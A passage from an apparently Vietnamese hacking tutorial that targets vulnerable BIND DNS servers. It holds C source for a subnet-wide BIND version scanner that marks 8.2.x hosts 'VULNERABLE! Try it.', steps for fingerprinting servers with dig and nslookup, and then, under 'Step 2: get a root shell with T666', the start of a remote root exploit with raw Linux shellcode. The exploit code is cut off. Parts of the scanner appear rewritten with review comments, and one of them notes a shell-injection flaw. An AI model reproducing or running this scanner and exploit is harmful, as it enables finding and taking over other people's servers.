if( (name[0] <= '0') || (name[0] >= '9') ) { host_entry = gethostbyname( name ); if( host_entry == NULL ) { if( option[0] != 1 ) { printf( "Can not scan %s.\n", name ); exit(0); } } if( option[0] != 1 ) { addr = *((struct in_addr *)host_entry->h_addr); ip = (unsigned char *)inet_ntoa( addr ); subnet = GetSubnet( ip ); } } if( (name[0] >= '0') && (name[0] <= '9') ) { host_entry = gethostbyaddr( name, strlen(name), AF_INET ); if( host_entry == NULL ) { if( option[0] != 1 ) { printf( "Can not scan %s.\n", name ); exit(0); } } if( option[0] != 1 ) { addr = *((struct in_addr *)host_entry->h_addr); ip = (unsigned char *)inet_ntoa( addr ); subnet = GetSubnet( ip ); } } if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) ) { Scan( ip ); printf( "Scanning Done.\n" ); remove( R1_DIR ); remove( R2_DIR ); exit(0); } if( option[1] == 1 ) { for( i = 0; i < 256; i++ ) { if( fork() == 0 ) { strcpy( subnet, itoa( i ) ); ip_s = ChangeSubnet( ip, subnet ); Scan( ip_s ); remove( R1_DIR ); remove( R2_DIR ); exit(0); } else { wait( NULL ); } continue; } printf( "Scanning Done.\n" ); exit(0); } if( option[2] == 1 ) { strcpy( cmd, SCAN_EXE ); strcat( cmd, name ); strcat( cmd, "/24" ); strcat( cmd, " > " ); strcat( cmd, R1_DIR ); chdir( SCAN_DIR ); system( cmd ); strcpy( cmd, "grep \"Interesting\" " ); strcat( cmd, R1_DIR ); strcat( cmd, " > " ); strcat( cmd, R2_DIR ); system( cmd ); if( ( fp = fopen( R2_DIR, "r" ) ) < 0 ) { printf( "File Open Error!\n" ); exit(0); } while( 1 ) { bzero( name, 200 ); temp = (char *)malloc( 200 ); strcpy( temp, " " ); temp = fgets( temp, 100, fp ); if( temp == NULL ) break; if( temp[21] == ' ' ) { for( i = 0; i < 16; i++ ) { if( (temp[i+23] != ' ') && (temp[i+23] != ')') ) { if( (temp[i+23] >= '0') && (temp[i+23] <= '9') ) { name[i] = temp[i+23]; } else { if( temp[i+23] == '.' 
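) name[i] = temp[i+23]; } } } } if( temp[21] != ' ' ) { for( i = 0; i < 50; i++ ) { if( temp[i+21] != ' ' ) name[i] = temp[i+21]; } } Scan( name ); free(temp); } remove( R1_DIR ); remove( R2_DIR ); } if( option[0] == 1 ) { printf( "Creator : Laks Bluesky\n" ); printf( "E-mail : <a href="mailto:lb0gspm@hanmail.net">lb0gspm@hanmail.net</a>\n\n" ); printf( "Version : 2.00 beta\n\n" ); printf( "2000.06.19\n" ); exit(0); } }

/*
 * itoa: render an int as a freshly malloc'd decimal string.
 *
 * The original handled only 0..999 and fell off the end of the function
 * for any other value (no return value, undefined behaviour); this version
 * formats any int.  Returns NULL if allocation fails.  The caller owns the
 * returned buffer and must free() it.  The buffer is always at least four
 * bytes so the existing `strcpy( subnet, itoa( i ) )` use with a 0..255
 * octet keeps working unchanged.
 */
char *itoa( int i )
{
    enum { ITOA_MIN_BUF = 4 };
    char tmp[32];   /* room for "-2147483648" and the terminator */
    char *ret;
    int len;
    size_t need;

    len = snprintf( tmp, sizeof tmp, "%d", i );
    if( len < 0 || (size_t)len >= sizeof tmp )
        return NULL;
    need = (size_t)len + 1;
    if( need < ITOA_MIN_BUF )
        need = ITOA_MIN_BUF;
    ret = malloc( need );
    if( ret == NULL )
        return NULL;
    memcpy( ret, tmp, (size_t)len + 1 );
    return ret;
}

/*
 * after_third_dot: return a pointer to the text following the third '.'
 * in a dotted-quad string, or NULL if the string holds fewer than three
 * dots.  The scan is bounded by the terminator, so a malformed address
 * can no longer walk off the end of the buffer (the original loops in
 * ChangeSubnet/GetSubnet only stopped when a third '.' was found).
 */
static const char *after_third_dot( const char *ip )
{
    const char *p;
    int dots = 0;

    for( p = ip; *p != '\0'; p++ ) {
        if( *p == '.' && ++dots == 3 )
            return p + 1;
    }
    return NULL;
}

/*
 * ChangeSubnet: build a new dotted-quad string from `ip` with everything
 * after the third '.' replaced by `subnet`.
 *
 * Returns a malloc'd string the caller must free(), or NULL when `ip` has
 * fewer than three dots or allocation fails.  The original copied exactly
 * four bytes of `subnet` into a fixed 16-byte buffer and relied on the
 * terminator being among them; this version sizes the buffer from the
 * inputs and always NUL-terminates.
 */
char *ChangeSubnet( char *ip, char *subnet )
{
    const char *last;
    char *ip_s;
    size_t prefix_len, subnet_len;

    last = after_third_dot( ip );
    if( last == NULL )
        return NULL;
    prefix_len = (size_t)(last - ip);   /* includes the third '.' */
    subnet_len = strlen( subnet );
    ip_s = malloc( prefix_len + subnet_len + 1 );
    if( ip_s == NULL )
        return NULL;
    memcpy( ip_s, ip, prefix_len );
    memcpy( ip_s + prefix_len, subnet, subnet_len + 1 );   /* copies the NUL too */
    return ip_s;
}

/*
 * GetSubnet: return the text after the third '.' of a dotted-quad string
 * (its last octet) as a malloc'd string the caller must free().
 *
 * Returns NULL when `ip` has fewer than three dots or allocation fails.
 * The buffer is always at least four bytes long because the caller later
 * overwrites it in place with a 1..3 digit octet via strcpy(); the
 * original always copied four bytes, reading past the terminator of a
 * one- or two-digit octet.
 */
char *GetSubnet( char *ip )
{
    enum { SUBNET_MIN_BUF = 4 };
    const char *last;
    char *ret;
    size_t len, need;

    last = after_third_dot( ip );
    if( last == NULL )
        return NULL;
    len = strlen( last );
    need = len + 1;
    if( need < SUBNET_MIN_BUF )
        need = SUBNET_MIN_BUF;
    ret = malloc( need );
    if( ret == NULL )
        return NULL;
    memcpy( ret, last, len + 1 );
    return ret;
}

/*
 * Scan: ask one host for its BIND version string (dig, CHAOS class,
 * version.bind TXT) via two shell commands, then compare the extracted
 * string against a fixed list and print a banner on a match.
 *
 * NOTE(review): `ip` is spliced into the dig and grep command lines and
 * handed to system() without any quoting.  The caller passes this function
 * strings parsed out of a report file with fgets() (see the loop above),
 * so shell metacharacters in that data would run as commands under the
 * scanner's own uid.  Validate the octets or avoid system() entirely.
 * NOTE(review): both malloc() results are used unchecked; `fp` is never
 * fclose()d; `fp >= 0` compares a pointer with an int and holds for NULL,
 * so a failed fopen() still reaches fgetc(); `c` is unsigned char, so EOF
 * can never be recognised; `version` (9 bytes) is only NUL-terminated when
 * a '"' arrives within the first nine characters read, otherwise the
 * strcmp() calls below read past the allocation.
 */
int Scan( char *ip ) {
    unsigned short int i;
    unsigned char c;
    unsigned char *cmd;
    unsigned char *version;
    FILE *fp;
    struct stat result;
    cmd = (char *)malloc( 200 );
    version = (char *)malloc( 9 );
    printf( "Scanning %s\n", ip );
    /* dig output goes to R1_DIR; stderr is discarded */
    strcpy( cmd, "dig @" );
    strcat( cmd, ip );
    strcat( cmd, " version.bind chaos txt > " );
    strcat( cmd, R1_DIR );
    strcat( cmd, " 2> /dev/null" );
    system( cmd );
    /* keep only the VERSION.BIND answer line in R2_DIR */
    strcpy( cmd, "grep \"VERSION.BIND.\" " );
    strcat( cmd, R1_DIR );
    strcat( cmd, " > " );
    strcat( cmd, R2_DIR );
    system( cmd );
    stat( R2_DIR, &result );
    /* a result shorter than 30 bytes is treated as "no answer" */
    if( result.st_size < 30 ) { chdir( CBIND_DIR ); return 0; }
    if( ( fp = fopen( R2_DIR, "r" ) ) >= 0 ) {
        /* skip a fixed 29-byte prefix, then copy up to 9 characters of the
           quoted version string, stopping at the closing quote */
        for( i = 0; i < 29; i++ ) { c = fgetc( fp ); }
        for( i = 0; i < 9; i++ ) {
            c = fgetc( fp );
            if( c == '"' ) { version[i] = '\0'; break; }
            version[i] = c;
        }
    } else { chdir( CBIND_DIR ); return 0; }
    if( strcmp( version, "8.2" ) == 0 ) { printf( "%s: IT IS VULNERABLE! ", ip ); printf( "Try it. \n" ); chdir( CBIND_DIR ); return 0; }
    if( strcmp( version, "8.2.1" ) == 0 ) { printf( "%s: IT IS VULNERABLE! ", ip ); printf( "Try it. \n" ); chdir( CBIND_DIR ); return 0; }
    if( strcmp( version, "8.2.2" ) == 0 ) { printf( "%s: IT IS VULNERABLE! ", ip ); printf( "Try it. 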
\n" ); chdir( CBIND_DIR ); return 0; } if( strcmp( version, "8.2.2-P5" ) == 0 ) { chdir( CBIND_DIR ); return 0; } if( strcmp( version, "8.1.2" ) == 0 ) { chdir( CBIND_DIR ); return 0; } chdir( CBIND_DIR ); return 0; } * Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận diện version của BIND NSLOOKUP # nslookup Default Server: ns.yourco.bogus Address: 333.333.333.333 > set class=chaos> set type=txt > version.bind Server: ns.yourco.bogus Address: 333.333.333.333 VERSION.BIND text = "8.2.2-P5" >DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>) dig version.bind txt chaos @<server>hoặc dig @ txt chaos version.bind Nếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug "nxt" Bước 2: lấy root shell bằng T666 #include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <signal.h>#include <time.h>#include <string.h>#include <ctype.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>#include <arpa/nameser.h>#include <netdb.h> char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,